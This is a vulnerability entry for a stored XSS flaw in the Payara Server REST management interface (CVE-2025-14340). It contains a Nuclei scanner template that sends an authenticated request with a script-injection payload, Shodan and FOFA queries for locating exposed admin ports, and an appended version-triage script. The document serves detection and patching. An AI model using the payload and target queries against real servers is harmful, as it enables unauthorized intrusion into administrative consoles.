
Payara Server - Cross-Site Scripting

CVE-2025-14340
Verified

Description

Payara Server versions <4.1.2.191.54, <5.83.0, <6.34.0, and <7.2026.1 contain a stored XSS vulnerability caused by improper input sanitization in the REST Management Interface. This allows attackers to mislead administrators into changing the admin password via a URL payload; however, the exploit requires administrator interaction.

Severity

High

CVSS Score

9

Exploit Probability

1%

Published Date

April 7, 2026

Template Author

0x_akoko, 0xr2r

CVE-2025-14340.yaml
id: CVE-2025-14340

info:
  name: Payara Server - Cross-Site Scripting
  author: 0x_Akoko,0xr2r
  severity: high
  description: |
   Payara Server versions <4.1.2.191.54, <5.83.0, <6.34.0, and <7.2026.1 contain a stored XSS vulnerability caused by improper input sanitization in the REST Management Interface. This allows attackers to mislead administrators into changing the admin password via a URL payload; however, the exploit requires administrator interaction.
  impact: |
   Attackers can trick administrators into changing the admin password, potentially leading to full administrative control.
  remediation: |
   Update to version 4.1.2.191.54, 5.83.0, 6.34.0, 7.2026.1 or later.
  reference:
    - https://github.com/DeepSecurityResearch/CVE-2025-14340
    - https://www.payara.fish
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14340
  classification:
    cve-id: CVE-2025-14340
    epss-score: 0.0066
    epss-percentile: 0.71338
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.0
    cwe-id: CWE-79
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"Payara Server" port:4848
    fofa-query: title="Payara Server" && port="4848"
  tags: cve,cve2025,payara,xss,glassfish,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /common/index.jsf HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Payara Foundation", "Payara")'
          - 'contains(header, "badassfish")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /management/domain/version?%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ":" + password)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'badassfish'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100911d9f14d906e1d19a5c4eb692f502b33fe71f422f024098b9dc798ae7319464022100b617b038dab5e93128c7487d2aa2306129e8b9132c4a88dd78d1ce4e21dbda9b:922c64590222798bb761d5b6d8e72950
CVSS Metrics

Score: 9.0
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
CVE ID: CVE-2025-14340
CWE ID: CWE-79

References

https://github.com/DeepSecurityResearch/CVE-2025-14340
https://www.payara.fish
https://nvd.nist.gov/vuln/detail/CVE-2025-14340

Remediation Steps

Update to version 4.1.2.191.54, 5.83.0, 6.34.0, 7.2026.1 or later.
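A triage helper for the remediation above, added here as an example and not part of the advisory or the Payara project: it compares Payara version strings against the first fixed release of each major line exactly as this page states them (4.1.2.191.54, 5.83.0, 6.34.0, 7.2026.1) and buckets an inventory into hosts that need the update, hosts already fixed, and hosts on a major line the advisory does not cover. The inventory hostnames and versions are constructed sample data.

```python
"""Patch triage for CVE-2025-14340 (Payara Server XSS). Constructed example."""

# First fixed release per major line, as stated on this page.
FIXED_VERSIONS = {
    4: (4, 1, 2, 191, 54),
    5: (5, 83, 0),
    6: (6, 34, 0),
    7: (7, 2026, 1),
}


def parse_version(version):
    """Turn '6.34.0' into (6, 34, 0); anything non-numeric raises ValueError."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable Payara version: {version!r}")
    return tuple(int(p) for p in parts)


def _pad(a, b):
    """Right-pad the shorter tuple with zeros so '5.83' compares as '5.83.0'."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def is_vulnerable(version):
    """True if version is below the first fixed release of its major line.

    Returns None for a major line the advisory does not mention, so callers
    can send it to manual review instead of silently treating it as safe.
    """
    parsed = parse_version(version)
    fixed = FIXED_VERSIONS.get(parsed[0])
    if fixed is None:
        return None
    parsed, fixed = _pad(parsed, fixed)
    return parsed < fixed


def triage(inventory):
    """Map {host: version} to {'patch': [...], 'ok': [...], 'review': [...]}."""
    buckets = {"patch": [], "ok": [], "review": []}
    for host, version in inventory.items():
        status = is_vulnerable(version)
        key = "review" if status is None else ("patch" if status else "ok")
        buckets[key].append(host)
    return buckets


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    sample = {"app-01": "6.33.2", "app-02": "6.34.0", "legacy": "4.1.2.191.40",
              "new": "7.2026.1", "odd": "8.0.0"}
    for bucket, hosts in triage(sample).items():
        print(bucket, hosts)
```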